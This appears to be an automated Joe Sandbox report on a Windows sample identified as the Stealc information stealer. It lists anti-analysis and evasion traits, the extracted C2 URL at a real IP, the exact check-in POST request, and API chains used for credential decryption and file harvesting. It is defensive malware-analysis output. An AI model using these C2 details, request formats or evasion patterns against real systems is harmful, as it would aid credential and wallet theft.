Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561860
MD5:63467d79a3f868e98b2560394e80345f
SHA1:fc3bca2a34ae3511f229f34483471a3804c4c24e
SHA256:dbc2fd08e4e008755e38c372dfca2d459535a27df0c9ee97abeed7fb186a42a3
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4576 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 63467D79A3F868E98B2560394E80345F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2189567754.0000000004B00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 4576JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 4576JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T14:56:18.703528+010020442431Malware Command and Control Activity Detected192.168.2.649723185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/c4becf79229cb002.phpu9Avira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpI9Avira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpy9Avira URL Cloud: Label: malware
              Found malware configuration
              Source: 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_004D4C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_004D60D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_004F40B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_004E6960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004DEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_004DEA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_004E6B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_004D9B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D9B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_004D9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_004D7750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004E18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004E3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004E1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004E1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004EE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004E4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004E4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004ECBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004ECBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004DDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004DDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004DDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004DDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_004E2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004E23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004ED530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004ED530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_004EDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004D16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004D16B9

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49723 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHCFCBKKJDGCAKFCFIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 44 30 45 33 34 32 35 34 38 35 33 30 32 35 39 39 37 34 31 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 2d 2d 0d 0a Data Ascii: ------CAEHCFCBKKJDGCAKFCFIContent-Disposition: form-data; name="hwid"F5D0E3425485302599741------CAEHCFCBKKJDGCAKFCFIContent-Disposition: form-data; name="build"mars------CAEHCFCBKKJDGCAKFCFI--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D6C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,0_2_004D6C40
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHCFCBKKJDGCAKFCFIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 44 30 45 33 34 32 35 34 38 35 33 30 32 35 39 39 37 34 31 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 2d 2d 0d 0a Data Ascii: ------CAEHCFCBKKJDGCAKFCFIContent-Disposition: form-data; name="hwid"F5D0E3425485302599741------CAEHCFCBKKJDGCAKFCFIContent-Disposition: form-data; name="build"mars------CAEHCFCBKKJDGCAKFCFI--
              Source: file.exe, 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2239380826.0000000000D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2239380826.0000000000D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.2239380826.0000000000D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000000.00000002.2239380826.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php9
              Source: file.exe, 00000000.00000002.2239380826.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpI9
              Source: file.exe, 00000000.00000002.2239380826.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpu9
              Source: file.exe, 00000000.00000002.2239380826.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpy9
              Source: file.exe, 00000000.00000002.2239380826.0000000000D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/p
              Source: file.exe, 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206tD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_004D9770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080C0870_2_0080C087
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A0_2_008A009A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008768A60_2_008768A6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F48B00_2_004F48B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007391050_2_00739105
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007461BA0_2_007461BA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A92780_2_007A9278
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088DAAB0_2_0088DAAB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00897ABB0_2_00897ABB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0089B2C10_2_0089B2C1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091EAC30_2_0091EAC3
